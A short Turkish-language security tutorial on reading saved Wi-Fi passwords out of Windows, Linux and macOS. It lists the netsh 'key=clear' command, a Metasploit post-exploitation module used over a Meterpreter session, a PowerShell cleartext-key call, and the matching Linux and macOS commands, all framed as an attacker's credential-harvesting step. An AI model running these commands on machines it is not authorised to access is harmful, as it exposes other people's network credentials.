Kullanıcılar kablosuz ağlara bağlanırken her defasında parola girmemek amacıyla, kablosuz ağ erişim bilgilerini işletim sistemi üzerinde kaydederler. Böylece hızlı bir şekilde kablosuz ağa erişim sağlayabilirler. Ancak bu durum kötüye kullanılabilir ve kayıtlı bu bilgiler ele geçirilebilir. Bu amaçla Windows’un standart komutlarından olan netsh aracı kullanılabilir.
netsh
wlan ?
Mevcut profiller listelenir.
wlan
show profile
Bu profiller disk sistemi üzerinde C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<ArayuzId> dizini altında kayıtlıdır.
Erişim bilgileri ele geçirilmek istenen profil adı seçilir ve incelenir.
show profile name=”Modemim”
Disk sistemi üzerinden ilgili dosya incelendiğinde profiller ile ilgili benzer bilgilere erişim sağlanabilmektedir. Ancak parolanın korumalı (protected) olduğu görülmektedir.
Not: Kablosuz ağ parolaları, Data Protection API (DPAPI) ile şifreli olarak kaydedilmektedir. Bir kullanıcı veya LocalSystem tarafından bu bilgilere erişim sağlanabilir.
Parolanın açık halini elde edebilmek için netsh aracı kullanılabilir.
show profile name=”Modemim” key=clear
Tek bir satırda parolayı elde etmek için aşağıdaki komut kullanılabilir.
netsh wlan show profile name=”Modemim” key=clear
Not: Meterpreter bağlantısının elde edilmesi durumunda, MSF wlan_profile post modülü ile de aynı kimlik bilgileri elde edilebilir.
use post/windows/wlan/wlan_profile
set session X
exploit
Not: netsh.exe kullanmadan Powershell Get-WiFiProfile fonksiyonu [i] kullanılarak da parola açık metin olarak elde edilebilir.
Get-WiFiProfile -ProfileName TestWiFi -ClearKey
Not: Linux ve MacOS işletim sistemleri için ise aşağıdaki komutlar kullanılabilir.
cat /etc/NetworkManager/system-connections/”Modemim”
security find-generic-password -ga “Modemim”
Kaynaklar:
[i] https://github.com/jcwalker/WiFiProfileManagement